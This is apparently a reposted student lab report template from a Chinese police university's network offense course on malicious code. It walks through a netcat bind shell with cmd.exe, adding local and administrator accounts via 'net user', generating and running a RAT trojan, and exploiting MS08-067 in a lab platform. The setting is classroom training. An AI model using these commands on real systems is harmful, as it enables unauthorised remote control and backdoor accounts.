【实验报告】四恶意代码实验
學???號201421420040
?
中國人民公安大學
Chinese people’?public security university
?
網絡對抗技術
實驗報告
?
| 實驗四 |
| 惡意代碼技術 |
?
?
?
| 學生姓名 | ?黃子龍 |
| 年級 | ?14級 |
| 區(qū)隊 | ?二區(qū)隊 |
| 指導教師 | ?高見老師 |
?
?
信息技術與網絡安全學院
2017年10月24日
?
實驗任務總綱
2017—2018?學年?第?一?學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識。
?
2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。
2.文檔要求結構清晰,圖文表達準確,標注規(guī)范。推理內容客觀、合理、邏輯性強。
3.軟件工具可使用NC、MSF等。
4.實驗結束后,保留電子文檔。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟件工具,按照實驗內容和要求提前做好實驗內容的準備。
2.實驗環(huán)境
描述實驗所使用的硬件和軟件環(huán)境(包括各種軟件工具);
開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。
3.實驗過程
1)啟動系統(tǒng)和啟動工具軟件環(huán)境。
2)用軟件工具實現實驗內容。
4.實驗報告
按照統(tǒng)一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規(guī)定的書寫格式書寫,表格要有表說圖形要有圖說。
?
任務一?利用NC控制電腦
?
?NetCat,具有網絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟件大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。
?
實驗過程需要兩個同學相互配合完成:
?
步驟一:
?
???在受害者的機器?(同學A)
輸入下面的命令:
nc.exe?-l -p port -e cmd.exe ??進入監(jiān)聽模式
?
?
?
步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc ip??port //連接victim_IP,然后得到一個shell。?(需要截圖)
?
?
?
?
?
步驟三:
?
????在shell中,利用net user?用戶名?密碼?/add?,添加一個用戶,并在受害者的機器中使用?net user?命令進行驗證。(需要截圖)
?
?
?
?
?
?
?可以繼續(xù)通過命令行做一些事情。
?
任務二?利用木馬控制電腦
?
實驗過程需要兩個同學配合:
?
步驟一:
?
??? 攻擊者的機器.?(同學A)
打開V2014.exe程序或則star RAT,這兩個木馬功能類似。
?
?
?
?
步驟二:
點擊菜單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和端口號,并點擊“生成”按鈕,生成木馬服務端。
?
?
?
?
?
?
?
?
步驟三:
?
將生成的木馬可執(zhí)行程序拷貝到受害者的機器,并雙擊運行。?
?
?雙擊運行不占用cpu。??
?
步驟四:
?
?
在控制端中查看木馬上線情況,并對以下功能每個進行測試和截圖。?
?
?
?
?
?
屏幕控制,嘗試獲取桌面
?
會話管理,卸載對方的木馬。
?
任務三?通過漏洞獲取shell(合天平臺中做)?所有過程截圖寫博客
?windows ms08067 漏洞利用
在平臺中獲取shell之后,繼續(xù)利用攻擊機器使用
net user user pass /add
net localgroup administrators /add
命令向被攻擊的機器中添加賬戶,并提升為管理員
然后用rdesktop 10.1.1.130 登陸對方的遠程桌面
?
?
?
?
?
?
?
??
?
?
?
轉載于:https://www.cnblogs.com/P201421420040/p/7751685.html
總結
以上是生活随笔為你收集整理的【实验报告】四恶意代码实验的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 《软件需求模式》阅读笔记04
- 下一篇: HDU2866 Special Prim